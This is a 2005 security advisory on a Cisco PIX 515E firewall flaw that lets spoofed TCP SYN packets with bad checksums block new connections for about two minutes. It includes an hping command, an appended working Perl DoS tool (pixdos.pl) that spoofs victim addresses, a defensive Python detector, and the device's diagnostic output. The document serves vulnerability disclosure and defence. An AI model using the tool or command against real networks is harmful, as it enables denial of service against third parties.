
Cisco PIX TCP Connection Prevention



Arhont Ltd.- Information Security

Arhont Advisory by:     Konstantin V. Gavrilenko (http://www.arhont.com)
Advisory:               Cisco PIX TCP Connection Prevention
Class:                  design bug
Version:                Tested on PIX515E, PIX OS version 6.3(3)
Model Specific:         Other versions might have the same bug


DETAILS:
When a host is located on the trusted side of the network behind the
PIX firewall, it is possible to prevent a new, legitimate TCP connection
from being established to a host located on the other side of the
firewall. To carry out such an attack, an attacker sends a specially
crafted TCP packet with an incorrect checksum through the PIX firewall,
spoofed so that it appears to originate from a legitimate host. The
attacker needs to specify the source and destination IP and port. Once
such a packet is received by the PIX firewall, no new TCP session can be
established with the addresses and ports specified in the malicious
packet. The connection stays blocked for around 2 minutes 2 seconds,
after which a new connection can be established again and the PIX
resumes normal operation. The attack does not affect connections that
are already established through the PIX.

Although it would take a lot of packets to disrupt the communication
between the hosts completely, we assume that the attacker's aim is to
prevent communication with a specific service on the remote hosts,
e.g. SSH, SMTP or TCP syslog. It takes around 15 seconds to generate
and send 65535 packets with a custom source port on a 100 Mbit LAN.

The attack was tested on a PIX 515E firewall with 64 MB of RAM
performing NAT on the external interface; the configuration file is
attached.

The custom packet can be easily generated with hping2 as follows:

arhontus / # hping -c 1 -S -s 31337 -k -b -p 22 192.168.xx.xxx


Allowing just one such packet through the PIX firewall will block
subsequent packets from port 31337 to port 22 for just over 2 minutes.

The sample Perl script that is used to automate source port increments
and generate malicious packets is attached.


RISK FACTOR: Medium


WORKAROUNDS: Await Cisco advice on details of the workarounds.
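
Until a vendor workaround is available, the trigger described under
DETAILS (a TCP SYN carrying an incorrect checksum) can be flagged on
traffic captured in front of the firewall. The following Python check is
an added example, not part of the original advisory or of Arhont's
tooling; the function names and the sample packets (RFC 5737
documentation addresses) are constructed for illustration.

```python
import socket
import struct

def csum16(data: bytes) -> int:
    """Folded 16-bit one's-complement sum (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def pseudo_header(src: bytes, dst: bytes, tcp_len: int) -> bytes:
    return src + dst + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len)

def bad_checksum_syn(ip_packet: bytes):
    """Return (src, sport, dst, dport) for a SYN with an invalid TCP checksum, else None."""
    if len(ip_packet) < 20 or ip_packet[0] >> 4 != 4 or ip_packet[9] != socket.IPPROTO_TCP:
        return None
    if struct.unpack("!H", ip_packet[6:8])[0] & 0x3FFF:
        return None  # fragment: the checksum only covers the reassembled segment
    total_len = struct.unpack("!H", ip_packet[2:4])[0]
    segment = ip_packet[(ip_packet[0] & 0x0F) * 4:total_len]
    if len(segment) < 20:
        return None
    src, dst = ip_packet[12:16], ip_packet[16:20]
    sport, dport = struct.unpack("!HH", segment[:4])
    syn_only = (segment[13] & 0x12) == 0x02  # SYN set, ACK clear
    # A valid segment plus its pseudo-header always sums to 0xFFFF.
    valid = csum16(pseudo_header(src, dst, len(segment)) + segment) == 0xFFFF
    hit = (socket.inet_ntoa(src), sport, socket.inet_ntoa(dst), dport)
    return hit if syn_only and not valid else None

def build_tcp(src, dst, sport, dport, flags=0x02, payload=b"", corrupt=False):
    """Constructed sample input: a minimal IPv4/TCP packet held in memory only."""
    s, d = socket.inet_aton(src), socket.inet_aton(dst)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, flags, 512, 0, 0) + payload
    check = ~csum16(pseudo_header(s, d, len(tcp)) + tcp) & 0xFFFF
    check ^= int(corrupt)  # flipping one bit makes the checksum invalid
    tcp = tcp[:16] + struct.pack("!H", check) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64,
                     socket.IPPROTO_TCP, 0, s, d)
    return ip + tcp

def scan(packets):
    """4-tuples for which a bad-checksum SYN was seen in the capture."""
    return [hit for hit in map(bad_checksum_syn, packets) if hit]

SAMPLE = [  # constructed traffic, RFC 5737 documentation addresses
    build_tcp("192.0.2.10", "198.51.100.5", 31337, 22),
    build_tcp("192.0.2.10", "198.51.100.5", 31337, 22, payload=b"abc", corrupt=True),
    build_tcp("192.0.2.10", "198.51.100.5", 40000, 22, flags=0x10, corrupt=True),
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Run it on packets captured at or beyond the firewall interface: a
capture taken on the sending host with checksum offload enabled shows
outbound segments with unfilled checksums and would be flagged wrongly.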


COMMUNICATION HISTORY:
PSIRT notified on 10/10/2005
P release on 22/11/2005


ADDITIONAL INFORMATION:
pixdos.pl tool is attached to this e-mail.

*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer at least 7 days
before releasing them to the public domains (such as CERT and BUGTRAQ).

If you would like to get more information about this issue, please do
not hesitate to contact the Arhont team at info@xxxxxxxxxx


APPENDIX 1. Show Tech output:

pixfw# sh tech

Cisco PIX Firewall Version 6.3(3)
Cisco PIX Device Manager Version 3.0(1)

Compiled on Wed 13-Aug-03 13:55 by morlee

pixfw up 44 days 19 hours

Hardware:   PIX-515E, 64 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0x300, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB

0: ethernet0: address is 0090.2799.118f, irq 10
1: ethernet1: address is 0090.2799.11b6, irq 11
2: ethernet2: address is 00a4.0080.d29c, irq 11
Licensed Features:
Failover:                    Disabled
VPN-DES:                     Enabled
VPN-3DES-AES:                Disabled
Maximum Physical Interfaces: 3
Maximum Interfaces:          5
Cut-through Proxy:           Enabled
Guards:                      Enabled
URL-filtering:               Enabled
Inside Hosts:                Unlimited
Throughput:                  Unlimited
IKE peers:                   Unlimited

This PIX has a Restricted (R) license.

Serial Number: 806330010 (0x300f9e9a)
Running Activation Key: 0x50c39a05 0x17a94508 0x39b8204a 0x50691aba
Configuration last modified by enable_15 at 19:04:14.354 UTC Sun Feb 14 1993

------------------ show clock ------------------

19:05:11.235 UTC Sun Feb 14 1993

------------------ show memory ------------------

Free memory:        49178768 bytes
Used memory:        17930096 bytes
-------------     ----------------
Total memory:       67108864 bytes

------------------ show conn count ------------------

99 in use, 4993 most used

------------------ show xlate count ------------------

175 in use, 176 most used

------------------ show blocks ------------------

  SIZE    MAX    LOW    CNT
     4   1600   1588   1599
    80    400    397    400
   256   1012    912   1011
  1550   1189    595    801

------------------ show interface ------------------

interface ethernet0 "outside" is up, line protocol is up
  Hardware is i82559 ethernet, address is 0090.2799.118f
  IP address *********, subnet mask 255.255.255.0
  MTU 1500 bytes, BW 100000 Kbit full duplex
        393729057 packets input, 3005934690 bytes, 0 no buffer
        Received 56994 broadcasts, 0 runts, 0 giants
        0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
        368741691 packets output, 3096620746 bytes, 0 underruns
        0 output errors, 0 collisions, 0 interface resets
        0 babbles, 0 late collisions, 0 deferred
        0 lost carrier, 0 no carrier
        input queue (curr/max blocks): hardware (128/128) software (0/22)
        output queue (curr/max blocks): hardware (0/100) software (0/1)
interface ethernet1 "inside" is up, line protocol is up
  Hardware is i82559 ethernet, address is 0090.2799.11b6
  IP address *********, subnet mask 255.255.255.0
  MTU 1500 bytes, BW 100000 Kbit full duplex
        368500878 packets input, 3132746326 bytes, 0 no buffer
        Received 36698 broadcasts, 0 runts, 0 giants
        0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
        393715693 packets output, 2991713049 bytes, 0 underruns
        0 output errors, 0 collisions, 0 interface resets
        0 babbles, 0 late collisions, 0 deferred
        0 lost carrier, 0 no carrier
        input queue (curr/max blocks): hardware (128/128) software (0/54)
        output queue (curr/max blocks): hardware (1/48) software (0/1)
interface ethernet2 "intf2" is administratively down, line protocol is down
  Hardware is i82559 ethernet, address is 00a4.0080.d29c
  MTU 1500 bytes, BW 10000 Kbit half duplex
        0 packets input, 0 bytes, 0 no buffer
        Received 0 broadcasts, 0 runts, 0 giants
        0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
        0 packets output, 0 bytes, 0 underruns
        0 output errors, 0 collisions, 0 interface resets
        0 babbles, 0 late collisions, 0 deferred
        0 lost carrier, 0 no carrier
        input queue (curr/max blocks): hardware (128/128) software (0/0)
        output queue (curr/max blocks): hardware (0/0) software (0/0)

------------------ show cpu usage ------------------

CPU utilization for 5 seconds = 0%; 1 minute: 3%; 5 minutes: 2%

------------------ show failover ------------------

No license for Failover

------------------ show traffic ------------------

outside:
        received (in 3870403.800 secs):
                393818423 packets       3019023411 bytes
                0 pkts/sec      1 bytes/sec
        transmitted (in 3870403.800 secs):
                368984754 packets       3401126889 bytes
                1 pkts/sec      0 bytes/sec
inside:
        received (in 3870404.160 secs):
                368698713 packets       3380524010 bytes
                0 pkts/sec      0 bytes/sec
        transmitted (in 3870404.160 secs):
                393788677 packets       3002331521 bytes
                0 pkts/sec      0 bytes/sec
intf2:
        received (in 3870404.160 secs):
                0 packets       0 bytes
                0 pkts/sec      0 bytes/sec
        transmitted (in 3870404.160 secs):
                0 packets       0 bytes
                0 pkts/sec      0 bytes/sec

------------------ show perfmon ------------------


PERFMON STATS:    Current      Average
Xlates               4/s          0/s
Connections          4/s          0/s
TCP Conns            4/s          0/s
UDP Conns            0/s          0/s
URL Access           0/s          0/s
URL Server Req       0/s          0/s
TCP Fixup         1236/s          0/s
TCPIntercept         0/s          0/s
HTTP Fixup           0/s          0/s
FTP Fixup            0/s          0/s
AAA Authen           0/s          0/s
AAA Author           0/s          0/s
AAA Account          0/s          0/s

------------------ show running-config ------------------

: Saved
:
PIX Version 6.3(3)
interface ethernet0 auto
interface ethernet1 auto
interface ethernet2 auto shutdown
nameif ethernet0 outside security0
nameif ethernet1 inside security100
nameif ethernet2 intf2 security4
enable password ******** encrypted
passwd ********* encrypted
hostname pixfw
domain-name testing.arhont.com
fixup protocol dns maximum-length 512
fixup protocol ftp 21
fixup protocol h323 h225 1720
fixup protocol h323 ras 1718-1719
fixup protocol http 80
fixup protocol rsh 514
fixup protocol rtsp 554
fixup protocol sip 5060
fixup protocol sip udp 5060
fixup protocol skinny 2000
fixup protocol smtp 25
fixup protocol sqlnet 1521
fixup protocol tftp 69
names
access-list acl_inbound permit icmp any any echo-reply
access-list acl_inbound permit icmp any any time-exceeded
access-list acl_inbound permit icmp any any unreachable
<access list entries skipped>
pager lines 24
logging on
logging timestamp
logging buffered warnings
logging trap warnings
logging history warnings
logging device-id hostname
logging host outside *********
mtu outside 1500
mtu inside 1500
mtu intf2 1500
ip address outside ********
ip address inside *******
no ip address intf2
ip audit info action alarm
ip audit attack action alarm
pdm location ********* 255.255.255.0 inside
pdm logging warnings 100
pdm history enable
arp timeout 14400
global (outside) 1
global (outside) 2
global (outside) 3
global (outside) 4
global (outside) 5
nat (inside) 1 access-list forcenat-105 0 0
nat (inside) 2 access-list forcenat-9 0 0
nat (inside) 3 access-list forcenat-1-net 0 0
nat (inside) 4 access-list forcenat-10-net 0 0
nat (inside) 5 access-list forcenat-11-net 0 0
nat (inside) 0 ********* 255.255.255.0 0 0
access-group acl_inbound in interface outside
rip outside default version 2 authentication md5 ******** 1
route outside 0.0.0.0 0.0.0.0 ********* 1
timeout xlate 3:00:00
timeout conn 3:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225 1:00:00
timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00
timeout uauth 0:05:00 absolute
aaa-server radius-acctport 1813
aaa-server TACACS+ protocol tacacs+
aaa-server RADIUS protocol radius
aaa-server RADIUS (outside) host ******** ******** timeout 20
aaa-server LOCAL protocol local
http server enable
http ********** 255.255.255.0 inside
snmp-server host inside *********** trap
snmp-server location Yuggoth
snmp-server contact Kthulhu
snmp-server community public
snmp-server enable traps
floodguard enable
crypto ipsec transform-set kosts esp-des esp-sha-hmac
crypto map kosmap 10 ipsec-isakmp
crypto map kosmap 10 match address 110
crypto map kosmap 10 set pfs group2
crypto map kosmap 10 set peer **********
crypto map kosmap 10 set transform-set kosts
crypto map kosmap 10 set security-association lifetime seconds 600 kilobytes 4608000
isakmp key ******** address ********* netmask 255.255.255.255
isakmp policy 10 authentication pre-share
isakmp policy 10 encryption des
isakmp policy 10 hash sha
isakmp policy 10 group 2
isakmp policy 10 lifetime 3600
telnet ********* 255.255.255.0 inside
telnet timeout 60
ssh ********* 255.255.255.0 inside
ssh timeout 30
console timeout 0
terminal width 80
Cryptochecksum:b4a63a116c67521e09fbbbc9fdec895e
: end



--
Respectfully,
Konstantin V. Gavrilenko

Arhont Ltd - Information Security

web:    http://www.arhont.com
        http://www.wi-foo.com
e-mail: k.gavrilenko@xxxxxxxxxx

tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141

PGP: Key ID - 0xE81824F4
PGP: Server - keyserver.pgp.com

#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP   perl module is not installed \n" if $@;
eval ("use Term::ProgressBar;");die "[error] Term::ProgressBar perl module is not installed \n" if $@;
my $VERSION = "0.1";
print "$0, $PgmName, V $VERSION \n";
GetOptions ( 
            "help" =>\$usage,
            "device=s" => \$device, 
            "source=s" =>\$sourceip,
            "dest=s"=>\$destip,
            "sourcemac=s"=>\$sourcemac,
            "destmac=s"=>\$destmac,
            "port=n"=> \$tcpport,
            );

######################## Config option #############################################

my $timeout = "0,1"; # Timeout

if ($usage) {&usage;} 
              
if (!$device) {
 $device= 'eth0'; # Network device
}

if (!$destmac) {print "Dest MAC not found \n"; &usage;}
if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip) {print "Dest IP not found \n"; &usage;}
if (!$tcpport) {print "TCP port not found \n"; &usage;}

my $syn="1"; # TCP SYN SET
my $tcpdata = "TEST";          # TCP payload
my $count=0;

####################################################################################

# Initialize progress bar
my $progress = Term::ProgressBar->new(32768);
$progress->minor(0);
$packet = new Net::RawIP;
$packet-> ethnew($device);


if (!$sourcemac) {
$packet -> ethset( dest => $destmac);
}else { 
$packet -> ethset( source =>$sourcemac, dest => $destmac);
}



for ($count=0; $count< 65537 ; $count++) {

$packet->set({

ip => {
saddr => $sourceip,
daddr => $destip 
},

tcp => {
        check => 0x0010 , # TCP Packet Checksum 0 for auto correct
        source => $count,
        dest => $tcpport,
        syn => $syn,
        data => $tcpdata
       }});
$packet->ethsend($timeout);
#$packet->send($timeout);

$progress->update($_);
$count++;
}

sub usage {
  print <<EOF ;
This program was originally written in the due course of writing
"Hacking Exposed Cisco Networks: Cisco Security Secrets and Solutions" book.
Tool author - Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs 
and comments to info@xxxxxxxxxx 

usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC]
          [--destmac=MAC] [--port=n]

Options:

  --help                This message
  --device              Network interface (default set eth0)
  --source              Victim source IP
  --dest                Victim destination IP
  --sourcemac           Victim source MAC
  --destmac             MAC Address of the gateway
  --port                TCP port 
  
Example: ./pixdos.pl --device eth0 --source 192.168.44.10 --dest 192.168.55.111 \
  --sourcemac 00:90:27:99:11:b6 --destmac 00:60:27:99:11:b6 --port 22 
EOF
  
  exit shift;
}